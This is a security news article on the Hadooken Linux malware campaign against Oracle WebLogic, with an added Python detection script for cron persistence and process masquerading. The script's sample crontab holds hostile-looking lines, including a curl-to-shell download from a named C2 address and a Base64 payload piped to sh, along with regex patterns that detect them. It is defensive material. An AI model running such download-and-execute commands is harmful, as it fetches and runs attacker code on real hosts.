
New Linux Malware Campaign Exploits Oracle Weblogic to Mine Cryptocurrency

Cybersecurity experts have found a new malware operation targeting Linux platforms to perform illegal cryptocurrency mining and deploy botnet malware.

The activity, which specifically singles out Oracle Weblogic servers, is designed to deliver a malware strain named Hadooken, according to cloud security vendor Aqua.

"When Hadooken is executed, it drops a Tsunami malware and deploys a crypto miner," security researcher Assaf Morag stated.

The attack chains exploit known security flaws and misconfigurations, such as weak credentials, to gain an initial foothold and execute arbitrary code on vulnerable instances.

This is accomplished by dropping two nearly identical payloads, one written in Python and the other a shell script, both of which retrieve the Hadooken malware from a remote server ("89.185.85[.]102" or "185.174.136[.]204").

"In addition, the shell script version attempts to iterate over various directories containing SSH data (such as user credentials, host information, and secrets) and uses this information to attack known servers," Morag stated.

"It then moves laterally across the organization or connected environments to further spread the Hadooken malware."

Hadooken packs two components, a cryptocurrency miner and a distributed denial-of-service (DDoS) botnet dubbed Tsunami (aka Kaiten), which has a history of targeting Jenkins and Weblogic services deployed on Kubernetes clusters.

Furthermore, the malware establishes persistence on the host by creating cron jobs that execute the crypto miner periodically at varied intervals.

Hadooken's defense evasion relies on a combination of tactics: Base64-encoded payloads, miner binaries dropped under innocuous names such as "bash" and "java" to blend in with legitimate processes, and deletion of artifacts after execution to hide signs of malicious activity.
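The two host-side behaviours described above (cron-based persistence and miner binaries masquerading as "bash" or "java") are the easiest to hunt for with a small script. The following is an added example for this write-up, not Aqua's tooling or any Hadooken code: it parses crontab entries and flags commands that decode Base64 into a shell, download-and-execute in one step, run from world-writable staging directories, or reference the two C2 addresses named in the article, and it flags running processes whose name is "bash" or "java" but whose executable lives outside the directories where those binaries normally reside. The sample crontab and process records are constructed, and the trusted-directory and staging-directory lists are assumptions to tune per host.

```python
"""Hunt for Hadooken-style persistence and process masquerading on Linux.

Added example for this article; not Aqua's tooling. The crontab text and
process records below are constructed samples, not captures from a victim.
"""
import re

# The two addresses named in the article, undefanged so they can be matched.
KNOWN_C2 = {"89.185.85.102", "185.174.136.204"}

# Assumption: where a legitimate bash or java binary is expected to live.
TRUSTED_BIN_DIRS = ("/bin/", "/usr/bin/", "/usr/local/bin/",
                    "/usr/lib/jvm/", "/opt/java/", "/opt/oracle/")

# Assumption: world-writable locations favoured by drop-and-run payloads.
STAGING_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

CRON_FIELDS = 5  # minute hour day-of-month month day-of-week


def parse_cron_line(line):
    """Return (schedule, command) for a crontab entry; None for blank, comment or VAR=value lines."""
    line = line.strip()
    if not line or line.startswith("#") or "=" in line.split()[0]:
        return None
    if line.startswith("@"):                      # @reboot, @hourly, ...
        parts = line.split(None, 1)
        return (parts[0], parts[1]) if len(parts) == 2 else None
    parts = line.split(None, CRON_FIELDS)
    if len(parts) < CRON_FIELDS + 1:
        return None
    return " ".join(parts[:CRON_FIELDS]), parts[CRON_FIELDS]


def cron_findings(command):
    """List the reasons a cron command resembles miner persistence; empty list means none."""
    reasons = []
    if any(ip in command for ip in KNOWN_C2):
        reasons.append("contacts known C2 address")
    if re.search(r"base64\s+(-d|--decode)", command) and re.search(r"\|\s*(ba)?sh\b", command):
        reasons.append("decodes base64 payload and pipes it to a shell")
    if any(d in command for d in STAGING_DIRS):
        reasons.append("executes from a world-writable staging directory")
    if re.search(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", command):
        reasons.append("downloads and executes in one step")
    return reasons


def scan_crontab(text):
    """Map each suspicious cron command to the list of reasons it was flagged."""
    hits = {}
    for line in text.splitlines():
        parsed = parse_cron_line(line)
        if parsed is None:
            continue
        _schedule, command = parsed
        reasons = cron_findings(command)
        if reasons:
            hits[command] = reasons
    return hits


def is_masquerading(name, exe_path):
    """True when a process is named like a system binary but runs from an unexpected path."""
    if name not in ("bash", "java"):
        return False
    return not exe_path.startswith(TRUSTED_BIN_DIRS)


def scan_processes(procs):
    """Return the PIDs of processes that masquerade as bash or java."""
    return [pid for pid, name, exe in procs if is_masquerading(name, exe)]


# Constructed sample crontab: one benign entry and three that mirror the described TTPs.
SAMPLE_CRONTAB = """\
# constructed sample, not a real capture
SHELL=/bin/sh
0 3 * * * /usr/bin/find /var/log -name '*.gz' -mtime +30 -delete
*/7 * * * * echo L2Rldi9zaG0vYmFzaA== | base64 -d | sh
@reboot curl -s http://89.185.85.102/x | sh
15 * * * * /dev/shm/java -c /dev/shm/conf.json
"""

# Constructed process records: (pid, comm, exe) as read from /proc/<pid>/comm and /proc/<pid>/exe.
SAMPLE_PROCESSES = [
    (812, "bash", "/usr/bin/bash"),
    (1304, "java", "/usr/lib/jvm/java-17/bin/java"),
    (2291, "java", "/tmp/.x/java"),
    (2300, "bash", "/dev/shm/bash"),
]

if __name__ == "__main__":
    for command, reasons in scan_crontab(SAMPLE_CRONTAB).items():
        print(f"cron: {command!r}: {', '.join(reasons)}")
    print("masquerading pids:", scan_processes(SAMPLE_PROCESSES))
```

On a live host, feed it the output of `crontab -l` for every user plus the files under /etc/cron.d, and build the process list from /proc. The path check is only a heuristic: a payload copied over the real /usr/bin/java would pass it, so pair it with package verification (`rpm -V` or `debsums`) and treat any "java" process with no WebLogic or JVM arguments as worth a closer look.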

Aqua noted that the IP address 89.185.85[.]102 is registered in Germany under the hosting company Aeza International LTD (AS210644), with a previous report from Uptycs in February 2024 linking it to an 8220 Gang cryptocurrency campaign that abused flaws in Apache Log4j and Atlassian Confluence Server and Data Center.

The second IP address 185.174.136[.]204, although presently inactive, is likewise related to Aeza Group Ltd. (AS216246). As emphasized by Qurium and EU DisinfoLab in July 2024, Aeza is a bulletproof hosting service provider with a presence in Moscow M9 and in two data centers in Frankfurt.

"The modus operandi of Aeza and its fast growth can be explained by the recruitment of young developers affiliated to bulletproof hosting providers in Russia offering shelter to cybercrime," the researchers noted in the paper.
